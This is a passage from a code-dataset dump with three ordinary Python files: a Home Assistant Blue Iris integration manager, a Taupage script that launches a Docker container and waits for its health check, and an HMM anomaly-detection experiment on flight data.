"github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.UNICODE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 58, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 66, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 66, "usage_type": "name"}, {"api_name": "nltk.word_tokenize", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 88, "usage_type": "name"}, {"api_name": "keras_preprocessing.text.Tokenizer", "line_number": 93, "usage_type": "call"}, {"api_name": "keras_preprocessing.sequence.pad_sequences", "line_number": 100, "usage_type": "call"}, {"api_name": "keras_preprocessing.sequence.pad_sequences", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 138, "usage_type": "name"}, {"api_name": "keras.initializers.initializers_v2.Constant", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 146, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 147, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 151, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.clip", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 152, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.clip", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.epsilon", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 153, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 157, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.clip", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 158, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 158, "usage_type": "call"}, {"api_name": 
"tensorflow.keras.backend.clip", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.epsilon", "line_number": 159, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 159, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.epsilon", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 165, "usage_type": "name"}]} +{"seq_id": "36359493888", "text": "\"\"\"\nSupport for Blue Iris.\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/blueiris/\n\"\"\"\nfrom datetime import datetime\nimport logging\nimport sys\nfrom typing import Optional\n\nfrom cryptography.fernet import InvalidToken\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.entity_registry import EntityRegistry, async_get\nfrom homeassistant.helpers.event import async_call_later, async_track_time_interval\n\nfrom ..api.blue_iris_api import BlueIrisApi\nfrom ..helpers.advanced_configurations_generator import AdvancedConfigurationGenerator\nfrom ..helpers.const import *\nfrom ..models.config_data import ConfigData\nfrom .configuration_manager import ConfigManager\nfrom .device_manager import DeviceManager\nfrom .entity_manager import EntityManager\nfrom .password_manager import PasswordManager\nfrom .storage_manager import StorageManager\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass BlueIrisHomeAssistant:\n def __init__(self, hass: HomeAssistant, password_manager: PasswordManager):\n self._hass = hass\n\n self._remove_async_track_time = None\n\n self._is_initialized = False\n self._is_updating = False\n\n self._entity_registry = None\n\n self._api = None\n self._entity_manager = None\n self._device_manager = None\n self._storage_manager = None\n self._config_generator: Optional[AdvancedConfigurationGenerator] = None\n\n self._config_manager = ConfigManager(password_manager)\n\n @property\n def api(self) -> BlueIrisApi:\n return self._api\n\n @property\n def entity_manager(self) -> EntityManager:\n return self._entity_manager\n\n @property\n def device_manager(self) -> DeviceManager:\n return self._device_manager\n\n @property\n def entity_registry(self) -> EntityRegistry:\n return self._entity_registry\n\n @property\n def config_manager(self) -> ConfigManager:\n return self._config_manager\n\n @property\n def storage_manager(self) -> StorageManager:\n return self._storage_manager\n\n @property\n def config_data(self) -> Optional[ConfigData]:\n if self._config_manager is not None:\n return self._config_manager.data\n\n return None\n\n async def async_init(self, entry: ConfigEntry):\n try:\n self._storage_manager = StorageManager(self._hass)\n\n await self._config_manager.update(entry)\n\n self._api = BlueIrisApi(self._hass, self._config_manager)\n self._entity_manager = EntityManager(self._hass, self)\n self._device_manager = DeviceManager(self._hass, self)\n self._config_generator = AdvancedConfigurationGenerator(self._hass, self)\n\n self._entity_registry = async_get(self._hass)\n\n self._hass.loop.create_task(self._async_init())\n except InvalidToken:\n error_message = \"Encryption key got corrupted, please remove the integration and re-add it\"\n\n _LOGGER.error(error_message)\n\n data = await self._storage_manager.async_load_from_store()\n data.key = None\n await 
self._storage_manager.async_save_to_store(data)\n\n await self._hass.services.async_call(\n \"persistent_notification\",\n \"create\",\n {\"title\": DEFAULT_NAME, \"message\": error_message},\n )\n\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to async_init, error: {ex}, line: {line_number}\")\n\n async def _async_init(self):\n load = self._hass.config_entries.async_forward_entry_setup\n\n for domain in SIGNALS:\n await load(self._config_manager.config_entry, domain)\n\n self._is_initialized = True\n\n await self.async_update_entry()\n\n async def _update_entities(self, now):\n self._hass.async_create_task(self.async_update(now))\n\n async def async_update_entry(self, entry: ConfigEntry = None):\n update_config_manager = entry is not None\n\n if not update_config_manager:\n entry = self._config_manager.config_entry\n\n self._remove_async_track_time = async_track_time_interval(\n self._hass, self._update_entities, SCAN_INTERVAL\n )\n\n if not self._is_initialized:\n _LOGGER.info(\n f\"NOT INITIALIZED - Failed handling ConfigEntry change: {entry.as_dict()}\"\n )\n return\n\n _LOGGER.info(f\"Handling ConfigEntry change: {entry.as_dict()}\")\n\n if update_config_manager:\n await self._config_manager.update(entry)\n\n await self._api.initialize()\n\n await self.async_update(datetime.now())\n\n data = await self.storage_manager.async_load_from_store()\n integration_data = data.integrations.get(entry.title)\n\n if update_config_manager and integration_data is not None:\n if integration_data.generate_configuration_files:\n async_call_later(self._hass, 5, self.generate_config_files)\n\n integration_data.generate_configuration_files = False\n\n await self.storage_manager.async_save_to_store(data)\n\n async def async_remove(self, entry: ConfigEntry):\n _LOGGER.info(f\"Removing current integration - {entry.title}\")\n\n if self._remove_async_track_time is not None:\n self._remove_async_track_time()\n self._remove_async_track_time = None\n\n unload = self._hass.config_entries.async_forward_entry_unload\n\n for domain in SUPPORTED_DOMAINS:\n await unload(entry, domain)\n\n await self._device_manager.async_remove()\n\n _LOGGER.info(f\"Current integration ({entry.title}) removed\")\n\n async def async_update(self, event_time):\n if not self._is_initialized:\n _LOGGER.info(f\"NOT INITIALIZED - Failed updating @{event_time}\")\n return\n\n try:\n if self._is_updating:\n _LOGGER.debug(f\"Skip updating @{event_time}\")\n return\n\n _LOGGER.debug(f\"Updating @{event_time}\")\n\n self._is_updating = True\n\n await self._api.async_update()\n\n self.device_manager.update()\n self.entity_manager.update()\n\n await self.dispatch_all()\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n _LOGGER.error(f\"Failed to async_update, Error: {ex}, Line: {line_number}\")\n\n self._is_updating = False\n\n async def delete_entity(self, domain, name):\n try:\n entity = self.entity_manager.get_entity(domain, name)\n device_name = entity.device_name\n unique_id = entity.unique_id\n\n self.entity_manager.delete_entity(domain, name)\n\n device_in_use = self.entity_manager.is_device_name_in_use(device_name)\n\n entity_id = self.entity_registry.async_get_entity_id(\n domain, DOMAIN, unique_id\n )\n self.entity_registry.async_remove(entity_id)\n\n if not device_in_use:\n await self.device_manager.delete_device(device_name)\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = 
tb.tb_lineno\n\n _LOGGER.error(f\"Failed to delete_entity, Error: {ex}, Line: {line_number}\")\n\n async def dispatch_all(self):\n if not self._is_initialized:\n _LOGGER.info(\"NOT INITIALIZED - Failed discovering components\")\n return\n\n for domain in SUPPORTED_DOMAINS:\n signal = SIGNALS.get(domain)\n\n async_dispatcher_send(self._hass, signal)\n\n def generate_config_files(self, now):\n self._config_generator.generate()\n", "repo_name": "elad-bar/ha-blueiris", "sub_path": "custom_components/blueiris/managers/home_assistant.py", "file_name": "home_assistant.py", "file_ext": "py", "file_size_in_byte": 8000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 154, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 33, "usage_type": "name"}, {"api_name": "password_manager.PasswordManager", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "helpers.advanced_configurations_generator.AdvancedConfigurationGenerator", "line_number": 47, "usage_type": "name"}, {"api_name": "configuration_manager.ConfigManager", "line_number": 49, "usage_type": "call"}, {"api_name": "api.blue_iris_api.BlueIrisApi", "line_number": 52, "usage_type": "name"}, {"api_name": "entity_manager.EntityManager", "line_number": 56, "usage_type": "name"}, {"api_name": "device_manager.DeviceManager", "line_number": 60, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity_registry.EntityRegistry", "line_number": 64, "usage_type": "name"}, {"api_name": "configuration_manager.ConfigManager", "line_number": 68, "usage_type": "name"}, {"api_name": "storage_manager.StorageManager", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 76, "usage_type": "name"}, {"api_name": "models.config_data.ConfigData", "line_number": 76, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 82, "usage_type": "name"}, {"api_name": "storage_manager.StorageManager", "line_number": 84, "usage_type": "call"}, {"api_name": "api.blue_iris_api.BlueIrisApi", "line_number": 88, "usage_type": "call"}, {"api_name": "entity_manager.EntityManager", "line_number": 89, "usage_type": "call"}, {"api_name": "device_manager.DeviceManager", "line_number": 90, "usage_type": "call"}, {"api_name": "helpers.advanced_configurations_generator.AdvancedConfigurationGenerator", "line_number": 91, "usage_type": "call"}, {"api_name": "homeassistant.helpers.entity_registry.async_get", "line_number": 93, "usage_type": "call"}, {"api_name": "cryptography.fernet.InvalidToken", "line_number": 96, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 112, "usage_type": "call"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 130, "usage_type": "name"}, {"api_name": "homeassistant.helpers.event.async_track_time_interval", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 153, "usage_type": "name"}, {"api_name": "homeassistant.helpers.event.async_call_later", "line_number": 160, "usage_type": "call"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 166, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 203, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 
227, "usage_type": "call"}, {"api_name": "homeassistant.helpers.dispatcher.async_dispatcher_send", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "40258428401", "text": "#!/usr/bin/env python3\n'''\nDocker runtime script: load /etc/taupage.yaml and run the Docker container\n'''\n\nimport argparse\nimport base64\nimport boto.kms\nimport boto.utils\nimport json\nimport logging\nimport os\nimport pierone.api\nimport pwd\nimport requests\nimport sys\nimport subprocess\nimport time\nimport yaml\n\nfrom taupage import is_sensitive_key, CREDENTIALS_DIR\n\nAWS_KMS_PREFIX = 'aws:kms:'\n\n\ndef get_region():\n identity = boto.utils.get_instance_identity()['document']\n return identity['region']\n\n\ndef decrypt(val):\n '''\n >>> decrypt(True)\n True\n\n >>> decrypt('test')\n 'test'\n '''\n if str(val).startswith(AWS_KMS_PREFIX):\n ciphertext_blob = val[len(AWS_KMS_PREFIX):]\n ciphertext_blob = base64.b64decode(ciphertext_blob)\n conn = boto.kms.connect_to_region(get_region())\n try:\n # HACK: ugly hack to fix boto Python 3 compat\n # \"decrypt\" expects bytes, but \"json.dumps\" uses bytes, too\n # which throws \"TypeError: .. is not JSON serializable\"\n # workaround: return Base64 as unicode string\n orig = base64.b64encode\n base64.b64encode = lambda x: orig(x).decode('ascii')\n data = conn.decrypt(ciphertext_blob)\n if 'Plaintext' not in data:\n raise Exception('KMS decrypt failed')\n finally:\n base64.b64encode = orig\n return data['Plaintext'].decode('utf-8')\n else:\n return val\n\n\ndef mask_command(cmd: list):\n '''\n >>> mask_command([])\n ''\n\n >>> mask_command(['-e', 'SECRET=abc'])\n '-e SECRET=MASKED'\n '''\n masked_cmd = []\n for arg in cmd:\n key, sep, val = arg.partition('=')\n if is_sensitive_key(key):\n val = 'MASKED'\n masked_cmd.append(key + sep + val)\n return ' '.join(masked_cmd)\n\n\ndef get_or(d: dict, key, default):\n '''\n Return value from dict if it evaluates to true or default otherwise\n\n This is a convenience function to treat \"null\" values in YAML config\n the same as an empty dictionary or list.\n\n >>> get_or({}, 'a', 'b')\n 'b'\n\n >>> get_or({'a': None}, 'a', 'b')\n 'b'\n\n >>> get_or({'a': 1}, 'a', 'b')\n 1\n '''\n return d.get(key) or default\n\n\ndef get_env_options(config: dict):\n '''build Docker environment options'''\n for key, val in get_or(config, 'environment', {}).items():\n yield '-e'\n yield '{}={}'.format(key, decrypt(val))\n\n if config.get('etcd_discovery_domain'):\n # TODO: use dynamic IP of docker0\n yield '-e'\n yield 'ETCD_URL=http://172.17.42.1:2379'\n\n # set APPLICATION_ID and APPLICATION_VERSION for convenience\n # NOTE: we should not add other environment variables here (even if it sounds tempting),\n # esp. EC2 metadata should not be passed as env. variables!\n for key in ('application_id', 'application_version'):\n yield '-e'\n yield '{}={}'.format(key.upper(), config.get(key))\n\n\ndef get_volume_options(config: dict):\n '''build Docker volume mount options'''\n for path, mount in get_or(config, 'mounts', {}).items():\n yield '-v'\n # /opt/taupage/init.d/10-prepare-disks.py will mount the path below \"/mounts\" on the host system\n yield '{}:{}'.format('/mounts{}'.format(path), path)\n\n # meta directory, e.g. 
containing application credentials retrieved by berry\n    yield '-v'\n    yield '/meta:/meta'\n    yield '-e'\n    yield 'CREDENTIALS_DIR={}'.format(CREDENTIALS_DIR)\n\n\ndef get_port_options(config: dict):\n    for host_port, container_port in get_or(config, 'ports', {}).items():\n        yield '-p'\n        yield '{}:{}'.format(host_port, container_port)\n\n\ndef get_other_options(config: dict):\n    if not config.get('root'):\n        # Docker only accepts UNIX user IDs (not names)\n        entry = pwd.getpwnam('application')\n        yield '-u'\n        yield str(entry.pw_uid)\n\n    for t in 'add', 'drop':\n        for cap in get_or(config, 'capabilities_{}'.format(t), []):\n            yield '--cap-{}={}'.format(t, cap)\n\n    if config.get('hostname'):\n        yield '--hostname={}'.format(config.get('hostname'))\n\n    if config.get('networking'):\n        yield '--net={}'.format(config.get('networking'))\n\n    if config.get('privileged'):\n        yield '--privileged'\n\n\ndef extract_registry(docker_image: str) -> str:\n    \"\"\"\n    >>> extract_registry('nginx')\n\n    >>> extract_registry('foo.bar.example.com:2195/namespace/my_repo:1.0')\n    'foo.bar.example.com:2195'\n    \"\"\"\n\n    parts = docker_image.split('/')\n    if len(parts) == 3:\n        return parts[0]\n    return None\n\n\ndef registry_login(config: dict, registry: str):\n    if 'pierone' not in registry:\n        logging.warning('Docker registry seems not to be Pier One, skipping OAuth login')\n        return\n    pierone_url = 'https://{}'.format(registry)\n    token_url = config.get('token_service_url')\n\n    if not token_url:\n        logging.warning('No token service URL configured in Taupage YAML (\"token_service_url\" property)')\n        return\n\n    path = os.path.join(CREDENTIALS_DIR, 'user.json')\n\n    while not os.path.exists(path):\n        logging.info('Waiting for berry to download OAuth credentials to {}..'.format(path))\n        time.sleep(5)\n\n    with open(path) as fd:\n        credentials = json.load(fd)\n\n    user = credentials.get('application_username')\n    passwd = credentials.get('application_password')\n\n    if not user or not passwd:\n        logging.warning('Invalid OAuth credentials: application user and/or password missing in %s', path)\n        return\n\n    pierone.api.docker_login(pierone_url, 'services', 'pierone', user, passwd, token_url=token_url, use_keyring=False)\n\n\ndef run_docker(cmd, dry_run):\n    logging.info('Starting Docker container: {}'.format(mask_command(cmd)))\n    if not dry_run:\n        max_tries = 3\n        for i in range(max_tries):\n            try:\n                out = subprocess.check_output(cmd)\n                break\n            except Exception as e:\n                if i+1 < max_tries:\n                    logging.info('Docker run failed (try {}/{}), retrying in 5s..'.format(i+1, max_tries))\n                    time.sleep(5)\n                else:\n                    raise e\n        container_id = out.decode('utf-8').strip()\n        logging.info('Container {} is running'.format(container_id))\n\n\ndef get_first(iterable, default=None):\n    if iterable:\n        for item in iterable:\n            return item\n    return default\n\n\ndef wait_for_health_check(config: dict):\n    health_check_port = config.get('health_check_port', get_first(sorted(get_or(config, 'ports', {}).keys())))\n    health_check_path = config.get('health_check_path')\n    health_check_timeout_seconds = get_or(config, 'health_check_timeout_seconds', 60)\n\n    if not health_check_path:\n        logging.info('Health check path is not configured, not waiting for health check')\n        return\n    if not health_check_port:\n        logging.warning('Health check port is not configured, skipping health check')\n        return\n\n    url = 'http://localhost:{}{}'.format(health_check_port, health_check_path)\n\n    start = time.time()\n    while time.time() < start + health_check_timeout_seconds:\n        logging.info('Waiting for health check 
{}:{}..'.format(health_check_port, health_check_path))\n try:\n response = requests.get(url, timeout=5)\n if response.status_code == 200:\n logging.info('Health check returned OK')\n return\n except:\n pass\n\n time.sleep(2)\n\n logging.error('Timeout of {}s expired for health check {}:{}'.format(\n health_check_timeout_seconds, health_check_port, health_check_path))\n sys.exit(2)\n\n\ndef main(args):\n\n with open(args.config) as fd:\n config = yaml.safe_load(fd)\n\n source = config['source']\n\n registry = extract_registry(source)\n\n if registry:\n registry_login(config, registry)\n\n cmd = ['docker', 'run', '-d', '--log-driver=syslog', '--restart=on-failure:10']\n for f in get_env_options, get_volume_options, get_port_options, get_other_options:\n cmd += list(f(config))\n cmd += [source]\n\n try:\n run_docker(cmd, args.dry_run)\n except Exception as e:\n logging.error('Docker run failed: %s', mask_command(str(e).split(' ')))\n sys.exit(1)\n\n wait_for_health_check(config)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', '-c', help='Config file', default='/etc/taupage.yaml')\n parser.add_argument('--dry-run', help='Print what would be done', action='store_true')\n args = parser.parse_args()\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n logging.getLogger(\"urllib3.connectionpool\").setLevel(logging.WARN)\n main(args)\n", "repo_name": "elgalu/taupage", "sub_path": "runtime/opt/taupage/runtime/Docker.py", "file_name": "Docker.py", "file_ext": "py", "file_size_in_byte": 8813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "boto.kms.utils.get_instance_identity", "line_number": 27, "usage_type": "call"}, {"api_name": "boto.kms.utils", "line_number": 27, "usage_type": "attribute"}, {"api_name": "boto.kms", "line_number": 27, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 41, "usage_type": "call"}, {"api_name": "boto.kms.kms.connect_to_region", "line_number": 42, "usage_type": "call"}, {"api_name": "boto.kms.kms", "line_number": 42, "usage_type": "attribute"}, {"api_name": "boto.kms", "line_number": 42, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 48, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 49, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 54, "usage_type": "attribute"}, {"api_name": "taupage.is_sensitive_key", "line_number": 71, "usage_type": "call"}, {"api_name": "taupage.CREDENTIALS_DIR", "line_number": 126, "usage_type": "argument"}, {"api_name": "pwd.getpwnam", "line_number": 138, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 172, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "taupage.CREDENTIALS_DIR", "line_number": 181, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 184, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 185, "usage_type": "call"}, {"api_name": "json.load", "line_number": 188, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 194, "usage_type": "call"}, {"api_name": 
"pierone.api.api.docker_login", "line_number": 197, "usage_type": "call"}, {"api_name": "pierone.api.api", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pierone.api", "line_number": 197, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 201, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 210, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 211, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 215, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 231, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 234, "usage_type": "call"}, {"api_name": "time.time", "line_number": 239, "usage_type": "call"}, {"api_name": "time.time", "line_number": 240, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 241, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 243, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 245, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 250, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 252, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 254, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 260, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 277, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 278, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 284, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 288, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 289, "usage_type": "attribute"}]} +{"seq_id": "19929554927", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nHMM voli aerei\n \n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats, linalg, integrate\nfrom hmmlearn import hmm\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# COV_DATA: set of the probability distributions over observations in each state\n# hellinger_dist: 1/2 * integral(sqrt (f(x)) - sqrt (g(x)) dx) \ndef hellinger_dist(mu_model, cov_model, mu_data, cov_data):\n num_comp1 = (linalg.det(cov_model)**(1/4))*(linalg.det(cov_data)**(1/4))\n den_comp1 = (linalg.det((cov_model + cov_data)/2)**(1/2))\n comp1 = num_comp1/den_comp1\n comp2 = float(np.exp((-1/8) * (mu_model - mu_data) @ np.linalg.matrix_power((cov_model+cov_data)/2, -1) @ (mu_model - mu_data).T))\n return 1 - comp1 * comp2\n\n\n# viene calcolato uno score ad ogni sliding window\n# quando supera la threshold è una anomalia\n\n# Viterbi training\ndef evaluate(model, data, w):\n i = w\n scores = []\n while(i <= data.shape[0]): \n # finestra all'istante t-esimo della ts data[0:t]->data[1:t+1]->data[2:t+2]\n Wt = data[i-w:i].copy()\n \n # utilizza l'algoritmo di Viterbi per trovare il Viterbi path (la sequenza di stati più probabile) basandosi sul modello corrente\n # ll: log probabilità della sequenza di stati prodotta\n # St: sequenza di stati prodotta (stessa lunghezza di Wt)\n ll, St = model.decode(Wt)\n \n # ritorna un array contenente i valori più comuni nell'array passato come parametro\n st = stats.mode(St)[0]\n \n # t through maximum likelihood with the data inside the 
window\n X = Wt[St == st]\n\n mu = np.reshape(np.mean(X, axis=0), [1, data.shape[1]])\n cov = (np.diag(np.cov(X.T)) + 1e-5) * np.eye(data.shape[1], data.shape[1])\n \n # calcolo con hellinger_dist lo score \n # the Hellinger distance is computed between Norm(µ, Sigma) and the emission probability of state s^t in lambda^N\n score = hellinger_dist(model.means_[st], model.covars_[st][0], mu, cov)\n \n scores.append(score)\n i += 1\n \n return scores\n\n\ndef bic_fun(funz_likelihood, params, data):\n \"\"\"\n Calcola la metrica per la scelta del modello all'interno di una classe di modelli\n \n -2 ln(L) + p*ln(len(data))\n \n - L è il valore max della funzione di likelihood ottenuta da model(HMM).score\n - p numero di parametri del modello HMM (Sezione: Structural architecture) https://en.wikipedia.org/wiki/Hidden_Markov_model \n \"\"\"\n \n bic = -2*funz_likelihood(data) + params*np.log(len(data))\n return bic\n\n\ndef chose_best_model(data, n_states_max=10):\n min_bic = float(\"inf\")\n n_states = 0\n best_hmm = None\n \n print(\"Identintifico il miglior modello...\")\n for N in range(1,n_states_max+1):\n\n print(\"Iterazione:\", N, end=\", \")\n \n hmm_candidate = hmm.GaussianHMM(n_components=N, covariance_type='diag', n_iter=100, random_state=0)\n hmm_candidate.fit(data)\n\n # Calcolo il numero parametri di HMM\n # - probabilità di transizione N*(N-1)\n # - distribuzione multivariata quindi MEDIE + MATRICE COVARIANZA = (N*M(M+3))/2\n #\n #(Sezione: Structural architecture) https://en.wikipedia.org/wiki/Hidden_Markov_model \n \n # n_features: Dimensionality of the Gaussian emissions.\n M = hmm_candidate.n_features\n\n #parameters = N*(N-1) + (N*M*(M+3))/2\n parameters = M + M^2 + N*M + N*M\n\n bic = bic_fun(hmm_candidate.score, parameters, data)\n \n if bic < min_bic:\n min_bic = bic\n best_hmm = hmm_candidate\n n_states = N\n\n\n print(\"miglior modello:\", n_states, \", valore bic=\", min_bic)\n\n return (best_hmm, n_states)\n\n\n################# MAIN\npath_train = './datasets/dataset_voli/187093582_train_set.csv'\npath_test = './datasets/dataset_voli/187093582_test_set.csv'\n\ntrain = pd.read_csv(path_train).values\ntest = pd.read_csv(path_test).values\n\nY = test[:,3]\ntest = np.delete(test, np.s_[3], axis=1)\n\n################# RIDUZIONE DEL RUMORE\n# ho provato con rolling mean ma vengono risultati molto pessimi\n# anche con decomposizione si ottengono dei risultati poco accettabili nonostante\n# la migliore stagionalità sia 367\n'''\ntrain_normalized = []\nfor column in train.transpose():\n \n # decomposizione serie temporale\n ts_column = pd.Series(column)\n decomposition = seasonal_decompose(ts_column, model=\"additive\", period=736) #367\n \n residual_absent = decomposition.seasonal + decomposition.trend\n residual_absent.dropna(inplace=True) \n train_normalized.append(residual_absent)\n\ntrain = np.array(train_normalized).transpose() # 1 - roll mean sul train set\n'''\n\n################# SCELTA MIGLIOR MODELLO\n# fa già il fitting dei dati\n#best_hmm, n_states = chose_best_model(train, 30)\n#print(\"Il miglior modello è quello con\", n_states)\n#model = best_hmm\n\n#K = 20\nK = 30 # miglior modello secondo BIC\nmodel = hmm.GaussianHMM(n_components=K, covariance_type=\"diag\", n_iter=100, random_state=0)\n\nmodel.fit(train)\n\n# %% grandezza della finestra variabile\nw_ott = 0\nmax_AUC = 0\n\nfor w in range(0,101,2):\n try:\n anomaly_scores = evaluate(model, test, w)\n except:\n continue\n \n fpr, tpr, t = roc_curve(Y[(w-1):], anomaly_scores)\n AUC = integrate.trapz(tpr, fpr)\n 
print(\"Finestra =\", w, \"AUC =\", AUC)\n \n if AUC > max_AUC:\n w_ott = w\n max_AUC = AUC\n\n# %% curva ROC e statistiche al variare della threshold\n#w_ott = 96\nw = w_ott # finestra ottimale\nanomaly_scores = evaluate(model, test, w)\n\nplt.figure(dpi=125)\nplt.plot(np.arange(0,240), anomaly_scores[0:240])\nplt.fill_between(np.arange(0,240), Y[(w-1):240+(w-1)], color='red', alpha=0.5)\nplt.ylim(bottom = -0.05, top = 1.05)\nplt.title(\"Anomaly score (dataset voli) - {} stati e finestra = {}\".format(K,w))\nplt.xlabel(\"Observation\")\nplt.ylabel(\"Score\")\nplt.show()\n\n# test e anomaly_scores hanno medesima lunghezza dato che non sono state fatte operazioni\n# per ridurre il rumore\nprint(len(test))\nprint(len(anomaly_scores))\n\n# label che evidenziano se c'è una ANOMALIA oppure NO\nprint(len(Y))\n\nthresholds = [i for i in np.arange(0,1,0.05)]\nprecs, recs, f1s, accs, tprs, fprs = [], [], [], [], [], []\n\nfor thresh in thresholds:\n tp, fp, tn, fn = 0, 0, 0, 0\n \n for i in range(len(anomaly_scores)):\n s = anomaly_scores[i]\n if s > thresh: # valore 